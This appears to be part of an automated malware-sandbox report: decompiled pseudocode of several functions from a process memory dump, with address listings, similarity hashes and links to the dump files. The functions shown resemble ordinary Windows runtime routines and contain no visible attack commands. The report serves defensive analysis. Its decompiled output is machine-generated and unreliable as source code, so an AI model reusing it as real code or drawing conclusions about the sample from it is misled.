                                                                                                                                0x04f6527d
                                                                                                                                0x04f6527e
                                                                                                                                0x04f65281
                                                                                                                                0x04f65282
                                                                                                                                0x04f65287
                                                                                                                                0x04f65288
                                                                                                                                0x04f6528a
                                                                                                                                0x04f6528f
                                                                                                                                0x04f65294
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f6529a
                                                                                                                                0x04f6529c
                                                                                                                                0x04f6529e
                                                                                                                                0x04f6529e
                                                                                                                                0x04f652a4
                                                                                                                                0x04f652b0
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f652ba
                                                                                                                                0x04f652bc
                                                                                                                                0x04f652bc
                                                                                                                                0x04f652d4
                                                                                                                                0x04f652d9
                                                                                                                                0x04f652dc
                                                                                                                                0x04f652e1
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f652e7
                                                                                                                                0x04f652f4
                                                                                                                                0x00000000
                                                                                                                                0x04f652f4
                                                                                                                                0x04f65270
                                                                                                                                0x00000000
                                                                                                                                0x04f65270
                                                                                                                                0x04f651fc
                                                                                                                                0x04f651fd
                                                                                                                                0x04f65202
                                                                                                                                0x04f65203
                                                                                                                                0x04f65205
                                                                                                                                0x04f6520a
                                                                                                                                0x04f6520f
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f6521b
                                                                                                                                0x04f65226
                                                                                                                                0x04f6522b
                                                                                                                                0x04f6521d
                                                                                                                                0x04f6521d
                                                                                                                                0x04f65222
                                                                                                                                0x04f65222
                                                                                                                                0x04f6522d
                                                                                                                                0x00000000

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID: Legacy$UEFI
                                                                                                                                • API String ID: 2994545307-634100481
                                                                                                                                • Opcode ID: 25e98e391f3ea8d1fca1ac6a228ba8f9fa593230366d335194c00a13c3bebf85
                                                                                                                                • Instruction ID: ac79839b0f0a6bfa0372a01a1823e08821d4e128be1953fd9bc1f769a2db596e
                                                                                                                                • Opcode Fuzzy Hash: 25e98e391f3ea8d1fca1ac6a228ba8f9fa593230366d335194c00a13c3bebf85
                                                                                                                                • Instruction Fuzzy Hash: C1518072E00709AFEB24DFA8D941AADB7F9FF48704F54502DE54AEB251E670E902CB10
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EEB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 78%
                                                                                                                                			E04EEB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x4fbf7a8);
				E04F3D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E04F3D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E04F2D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E04F2F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L04F3DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E04F2B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E04F2B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E04F2E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E04F2A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                                                                                0x04eeb171
                                                                                                                                0x04eeb171
                                                                                                                                0x04eeb171
                                                                                                                                0x04eeb171
                                                                                                                                0x04eeb171
                                                                                                                                0x04eeb176
                                                                                                                                0x04eeb17b
                                                                                                                                0x04eeb180
                                                                                                                                0x04eeb186
                                                                                                                                0x04eeb18f
                                                                                                                                0x04eeb198
                                                                                                                                0x04eeb1a4
                                                                                                                                0x04eeb1aa
                                                                                                                                0x04f44802
                                                                                                                                0x04f44802
                                                                                                                                0x04f44805
                                                                                                                                0x04f4480c
                                                                                                                                0x04f4480e
                                                                                                                                0x04eeb1d1
                                                                                                                                0x04eeb1d3
                                                                                                                                0x04eeb1de
                                                                                                                                0x04eeb1de
                                                                                                                                0x04f44817
                                                                                                                                0x04f4481e
                                                                                                                                0x04f44820
                                                                                                                                0x04f44822
                                                                                                                                0x04f44822
                                                                                                                                0x04f44824
                                                                                                                                0x04f44824
                                                                                                                                0x04f4482a
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f44835
                                                                                                                                0x04f4483a
                                                                                                                                0x04f4483d
                                                                                                                                0x04f4483f
                                                                                                                                0x04f44842
                                                                                                                                0x04f44842
                                                                                                                                0x04f44842
                                                                                                                                0x04f44846
                                                                                                                                0x04f4484c
                                                                                                                                0x04f4484e
                                                                                                                                0x04f44851
                                                                                                                                0x04f44851
                                                                                                                                0x04f44853
                                                                                                                                0x04f44854
                                                                                                                                0x04f44854
                                                                                                                                0x04f44858
                                                                                                                                0x04f4485a
                                                                                                                                0x04f4485a
                                                                                                                                0x04f4485d
                                                                                                                                0x04f4485f
                                                                                                                                0x04f44861
                                                                                                                                0x04f44861
                                                                                                                                0x04f44866
                                                                                                                                0x04f4486b
                                                                                                                                0x04f4486e
                                                                                                                                0x04f44871
                                                                                                                                0x04f44876
                                                                                                                                0x04f44876
                                                                                                                                0x04f44878
                                                                                                                                0x04f4487b
                                                                                                                                0x04f44884
                                                                                                                                0x04f44884
                                                                                                                                0x00000000
                                                                                                                                0x04f4487d
                                                                                                                                0x04f4487d
                                                                                                                                0x04f44882
                                                                                                                                0x04f44889
                                                                                                                                0x04f44889
                                                                                                                                0x04f4488f
                                                                                                                                0x04f44891
                                                                                                                                0x04f448e0
                                                                                                                                0x04f448e2
                                                                                                                                0x04f448e4
                                                                                                                                0x04f448e4
                                                                                                                                0x04f448e7
                                                                                                                                0x04f448e7
                                                                                                                                0x04f448ed
                                                                                                                                0x04f448f4
                                                                                                                                0x04f448f6
                                                                                                                                0x04f44951
                                                                                                                                0x04f44951
                                                                                                                                0x04f44953
                                                                                                                                0x04f44953
                                                                                                                                0x04f44956
                                                                                                                                0x04f44956
                                                                                                                                0x04f44958
                                                                                                                                0x04f44959
                                                                                                                                0x04f44959
                                                                                                                                0x04f4495d
                                                                                                                                0x04f4495d
                                                                                                                                0x04f4495f
                                                                                                                                0x04f4495f
                                                                                                                                0x04f44965
                                                                                                                                0x04f44969
                                                                                                                                0x04f449ba
                                                                                                                                0x04f449ba
                                                                                                                                0x04f449c1
                                                                                                                                0x04f449c5
                                                                                                                                0x04f449cc
                                                                                                                                0x04f449d4
                                                                                                                                0x04f449d7
                                                                                                                                0x04f449da
                                                                                                                                0x04f449e4
                                                                                                                                0x04f449e5
                                                                                                                                0x04f449f3
                                                                                                                                0x04f44a02
                                                                                                                                0x00000000
                                                                                                                                0x04f44a02
                                                                                                                                0x04f44972
                                                                                                                                0x04f44974
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f44976
                                                                                                                                0x04f44979
                                                                                                                                0x04f44982
                                                                                                                                0x04f44983
                                                                                                                                0x04f44984
                                                                                                                                0x04f4498b
                                                                                                                                0x04f4498d
                                                                                                                                0x04f44991
                                                                                                                                0x04f44993
                                                                                                                                0x04f44999
                                                                                                                                0x04f4499d
                                                                                                                                0x04f449a2
                                                                                                                                0x04f449a2
                                                                                                                                0x04f449a2
                                                                                                                                0x04f44999
                                                                                                                                0x04f449ac
                                                                                                                                0x00000000
                                                                                                                                0x04f449b3
                                                                                                                                0x04f448f8
                                                                                                                                0x04f448fe
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f448fe
                                                                                                                                0x04f44895
                                                                                                                                0x04f4489c
                                                                                                                                0x04f448ad
                                                                                                                                0x04f448b2
                                                                                                                                0x04f448b5
                                                                                                                                0x04f448b7
                                                                                                                                0x04f448ba
                                                                                                                                0x04f448bc
                                                                                                                                0x04f448c6
                                                                                                                                0x04f448c6
                                                                                                                                0x04f448cb
                                                                                                                                0x04f448d1
                                                                                                                                0x04f448d4
                                                                                                                                0x04f448d8
                                                                                                                                0x04f448d8
                                                                                                                                0x00000000
                                                                                                                                0x04f448d8
                                                                                                                                0x04f448be
                                                                                                                                0x04f448c0
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f448c2
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f448c4
                                                                                                                                0x00000000
                                                                                                                                0x04f44882
                                                                                                                                0x04f4487b
                                                                                                                                0x04f44904
                                                                                                                                0x04f44906
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f44908
                                                                                                                                0x04f4490e
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f44910
                                                                                                                                0x04f44917
                                                                                                                                0x04f44917
                                                                                                                                0x00000000
                                                                                                                                0x04f44917
                                                                                                                                0x04eeb1ba
                                                                                                                                0x04f447f9
                                                                                                                                0x04f447fc
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f447fc
                                                                                                                                0x04eeb1c0
                                                                                                                                0x04eeb1c0
                                                                                                                                0x04eeb1c3
                                                                                                                                0x04eeb1cb
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID: _vswprintf_s
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 677850445-0
                                                                                                                                • Opcode ID: 45bc17311d5ba2237b57e6fc9be60272b0231b4b4342cd7e578ba44180127a22
                                                                                                                                • Instruction ID: 51d22dc424dd93f4215f925286e2ae93a11644075e348a219d0d5d6a9cf427a4
                                                                                                                                • Opcode Fuzzy Hash: 45bc17311d5ba2237b57e6fc9be60272b0231b4b4342cd7e578ba44180127a22
                                                                                                                                • Instruction Fuzzy Hash: 1851D371D002698FEB31CF64C945BBEBFB0BF40724F2041ADD859AB281DB7169469B90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F0B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 76%
                                                                                                                                			E04F0B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x4fdd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E04F07D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E04FB8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E04F29E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E04F2B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E04F2CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E04F07D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E04FB8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E04F2AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x4fd8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x4fd862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x4fd8628; // 0x0
							_t116 =  *0x4fd862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                                                                                0x04f0b94c
                                                                                                                                0x04f0b956
                                                                                                                                0x04f0b95c
                                                                                                                                0x04f0b95e
                                                                                                                                0x04f0b964
                                                                                                                                0x04f0b969
                                                                                                                                0x04f0b96d
                                                                                                                                0x04f0b96d
                                                                                                                                0x04f0b970
                                                                                                                                0x04f0b974
                                                                                                                                0x04f0b97a
                                                                                                                                0x04f0badf
                                                                                                                                0x04f0badf
                                                                                                                                0x04f0bae2
                                                                                                                                0x04f0bae4
                                                                                                                                0x04f0bae6
                                                                                                                                0x04f0baf0
                                                                                                                                0x04f52cb8
                                                                                                                                0x04f0baf6
                                                                                                                                0x04f0baf6
                                                                                                                                0x04f0baf6
                                                                                                                                0x04f0bafd
                                                                                                                                0x04f0bb1f
                                                                                                                                0x04f0bb1f
                                                                                                                                0x04f0baff
                                                                                                                                0x04f0bb00
                                                                                                                                0x04f0bb00
                                                                                                                                0x04f0bb03
                                                                                                                                0x04f0bb03
                                                                                                                                0x04f0bacb
                                                                                                                                0x04f0bacf
                                                                                                                                0x04f0bad0
                                                                                                                                0x04f0bad1
                                                                                                                                0x04f0badc
                                                                                                                                0x04f0badc
                                                                                                                                0x04f0b980
                                                                                                                                0x04f0b980
                                                                                                                                0x04f0b988
                                                                                                                                0x04f0b98b
                                                                                                                                0x04f0b98d
                                                                                                                                0x04f0b990
                                                                                                                                0x04f0b993
                                                                                                                                0x04f0b999
                                                                                                                                0x04f0b99b
                                                                                                                                0x04f0b9a1
                                                                                                                                0x04f0b9a5
                                                                                                                                0x04f0b9aa
                                                                                                                                0x04f0b9b0
                                                                                                                                0x04f0b9bb
                                                                                                                                0x04f0b9c0
                                                                                                                                0x04f0b9c3
                                                                                                                                0x04f0b9ca
                                                                                                                                0x04f0b9cc
                                                                                                                                0x04f0b9cf
                                                                                                                                0x04f0b9d3
                                                                                                                                0x04f0b9d7
                                                                                                                                0x04f0ba94
                                                                                                                                0x04f0ba94
                                                                                                                                0x04f0ba98
                                                                                                                                0x04f0baa3
                                                                                                                                0x04f52ccb
                                                                                                                                0x04f0baa9
                                                                                                                                0x04f0baa9
                                                                                                                                0x04f0baa9
                                                                                                                                0x04f0bab1
                                                                                                                                0x04f52cd5
                                                                                                                                0x04f52cdd
                                                                                                                                0x04f52cdd
                                                                                                                                0x04f0babb
                                                                                                                                0x04f0babc
                                                                                                                                0x04f0bac2
                                                                                                                                0x04f0bac3
                                                                                                                                0x04f0bac3
                                                                                                                                0x04f0bac6
                                                                                                                                0x00000000
                                                                                                                                0x04f0b9dd
                                                                                                                                0x04f0b9dd
                                                                                                                                0x04f0b9e7
                                                                                                                                0x04f0b9e7
                                                                                                                                0x04f0b9ec
                                                                                                                                0x04f0b9ec
                                                                                                                                0x04f0b9f1
                                                                                                                                0x04f0b9f5
                                                                                                                                0x04f0b9fa
                                                                                                                                0x04f0ba00
                                                                                                                                0x04f0ba0c
                                                                                                                                0x04f0ba10
                                                                                                                                0x04f0ba10
                                                                                                                                0x04f0ba12
                                                                                                                                0x04f0ba18
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f0bb26
                                                                                                                                0x04f0bb26
                                                                                                                                0x04f0ba1e
                                                                                                                                0x04f0ba1e
                                                                                                                                0x04f0ba23
                                                                                                                                0x04f0ba25
                                                                                                                                0x04f0ba2c
                                                                                                                                0x04f0ba30
                                                                                                                                0x04f0ba35
                                                                                                                                0x04f0ba35
                                                                                                                                0x04f0ba41
                                                                                                                                0x04f0ba46
                                                                                                                                0x04f0ba4c
                                                                                                                                0x04f0ba50
                                                                                                                                0x04f0ba54
                                                                                                                                0x04f0ba6a
                                                                                                                                0x04f0ba6e
                                                                                                                                0x04f0ba70
                                                                                                                                0x04f0ba74
                                                                                                                                0x04f0ba78
                                                                                                                                0x04f0ba7a
                                                                                                                                0x04f0ba7c
                                                                                                                                0x04f0ba8e
                                                                                                                                0x04f0ba90
                                                                                                                                0x04f0ba92
                                                                                                                                0x04f0bb14
                                                                                                                                0x04f0bb14
                                                                                                                                0x04f0bb16
                                                                                                                                0x04f0bb16
                                                                                                                                0x00000000
                                                                                                                                0x04f0ba7c
                                                                                                                                0x04f0bb0a
                                                                                                                                0x04f0bb0d
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f0bb0f

                                                                                                                                APIs
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04F0B9A5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 885266447-0
                                                                                                                                • Opcode ID: e92c17fa6800e74df9997ba0afa9ffd06979fc1aab77d250ab9913230df8c4a2
                                                                                                                                • Instruction ID: ca07983df25306eafacb5cc637fc09ca9886abbad8366602ba31efdc737a51b8
                                                                                                                                • Opcode Fuzzy Hash: e92c17fa6800e74df9997ba0afa9ffd06979fc1aab77d250ab9913230df8c4a2
                                                                                                                                • Instruction Fuzzy Hash: 6E515571A08301CFC720DFA9C48092ABBE5FBC8654F14896EE99587395E730F842DB92
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F12581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 81%
                                                                                                                                			E04F12581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t225;
				signed int _t229;
				signed int _t250;
				signed int _t252;
				intOrPtr _t254;
				signed int _t257;
				signed int _t264;
				signed int _t267;
				signed int _t275;
				intOrPtr _t281;
				signed int _t283;
				signed int _t285;
				void* _t288;
				signed int _t289;
				unsigned int _t292;
				signed int _t296;
				signed int _t306;
				signed int _t310;
				intOrPtr _t322;
				signed int _t331;
				signed int _t333;
				signed int _t334;
				signed int _t338;
				signed int _t339;
				signed int _t341;
				signed int _t343;
				signed int _t345;
				void* _t346;
				void* _t348;

				_t343 = _t345;
				_t346 = _t345 - 0x4c;
				_v8 =  *0x4fdd360 ^ _t343;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t338 = 0x4fdb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t292 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t281 = 0x48;
				_t320 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t331 = 0;
				_v37 = (_v24 >> 0x0000001c & 0x00000003) == 1;
				if(_v48 <= 0) {
					L16:
					_t45 = _t281 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t339 = 0xc0000106;
						goto L32;
					} else {
						_t338 = L04F04620(_t292,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t281);
						_v52 = _t338;
						__eflags = _t338;
						if(_t338 == 0) {
							_t339 = 0xc0000017;
							goto L32;
						} else {
							 *(_t338 + 0x44) =  *(_t338 + 0x44) & 0x00000000;
							_t50 = _t338 + 0x48; // 0x48
							_t333 = _t50;
							_t320 = _v32;
							 *((intOrPtr*)(_t338 + 0x3c)) = _t281;
							_t283 = 0;
							 *((short*)(_t338 + 0x30)) = _v48;
							__eflags = _t320;
